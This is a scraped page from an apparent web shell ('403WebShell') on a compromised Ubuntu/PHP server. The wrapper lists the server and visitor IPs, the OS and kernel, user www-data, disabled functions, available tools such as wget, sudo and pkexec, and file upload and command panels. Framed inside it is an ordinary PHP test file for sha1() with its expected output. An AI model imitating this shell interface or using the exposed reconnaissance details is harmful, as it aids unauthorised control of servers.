????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/strings/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/strings/sha1_variation2.phpt
--TEST--
Test sha1() function : usage variations - unexpected values for 'raw' argument 
--FILE--
<?php

/* Prototype: string sha1  ( string $str  [, bool $raw_output  ] )
 * Description: Calculate the sha1 hash of a string
 */

echo "*** Testing sha1() : unexpected values for 'raw' ***\n";

$string = "Hello World";

//get an unset variable
$unset_var = 10;
unset ($unset_var);

//defining class for object variable
class MyClass
{
  public function __toString()
  {
    return "object";
  }
}

//resource variable
$fp = fopen(__FILE__, 'r');

//different values for 'str' argument
$values = array(

		  // int data
/*1*/	  0,
		  1,
		  12345,
		  -2345,
		
		  // float data
/*5*/	  10.5,
		  -10.5,
		  10.1234567e10,
		  10.1234567E-10,
		  .5,
		
		  // array data
/*10*/	  array(),
		  array(0),
		  array(1),
		  array(1, 2),
		  array('color' => 'red', 'item' => 'pen'),
		
		  // null data
/*15*/	  NULL,
		  null,
		
  		  // string data
/*17*/	  "ABC",
  		  'abc',
  		  "0abc",
  		  "123abc",
		
		  // empty data
/*21*/	  "",
		  '',
		
		  // object data
/*23*/	  new MyClass(),
		
		  // undefined data
/*24*/	  @$undefined_var,
		
		  // unset data
/*25*/	  @$unset_var,
		
		  //resource data
/*26*/	  $fp
);

// loop through each element of $values for 'raw' argument
for($count = 0; $count < count($values); $count++) {
  echo "-- Iteration ".($count+1)." --\n";
  // use bin2hex to catch those cases were raw is true
  var_dump( bin2hex(sha1($string, $values[$count])) );
}

//closing resource
fclose($fp);

?>
===DONE===
--EXPECTF--
*** Testing sha1() : unexpected values for 'raw' ***
-- Iteration 1 --
string(80) "30613464353561386437373865353032326661623730313937376335643834306262633438366430"
-- Iteration 2 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 3 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 4 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 5 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 6 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 7 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 8 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 9 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 10 --

Warning: sha1() expects parameter 2 to be boolean, array given in %s on line %d
string(0) ""
-- Iteration 11 --

Warning: sha1() expects parameter 2 to be boolean, array given in %s on line %d
string(0) ""
-- Iteration 12 --

Warning: sha1() expects parameter 2 to be boolean, array given in %s on line %d
string(0) ""
-- Iteration 13 --

Warning: sha1() expects parameter 2 to be boolean, array given in %s on line %d
string(0) ""
-- Iteration 14 --

Warning: sha1() expects parameter 2 to be boolean, array given in %s on line %d
string(0) ""
-- Iteration 15 --
string(80) "30613464353561386437373865353032326661623730313937376335643834306262633438366430"
-- Iteration 16 --
string(80) "30613464353561386437373865353032326661623730313937376335643834306262633438366430"
-- Iteration 17 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 18 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 19 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 20 --
string(40) "0a4d55a8d778e5022fab701977c5d840bbc486d0"
-- Iteration 21 --
string(80) "30613464353561386437373865353032326661623730313937376335643834306262633438366430"
-- Iteration 22 --
string(80) "30613464353561386437373865353032326661623730313937376335643834306262633438366430"
-- Iteration 23 --

Warning: sha1() expects parameter 2 to be boolean, object given in %s on line %d
string(0) ""
-- Iteration 24 --
string(80) "30613464353561386437373865353032326661623730313937376335643834306262633438366430"
-- Iteration 25 --
string(80) "30613464353561386437373865353032326661623730313937376335643834306262633438366430"
-- Iteration 26 --

Warning: sha1() expects parameter 2 to be boolean, resource given in %s on line %d
string(0) ""
===DONE===

Youez - 2016 - github.com/yon3zu
LinuXploit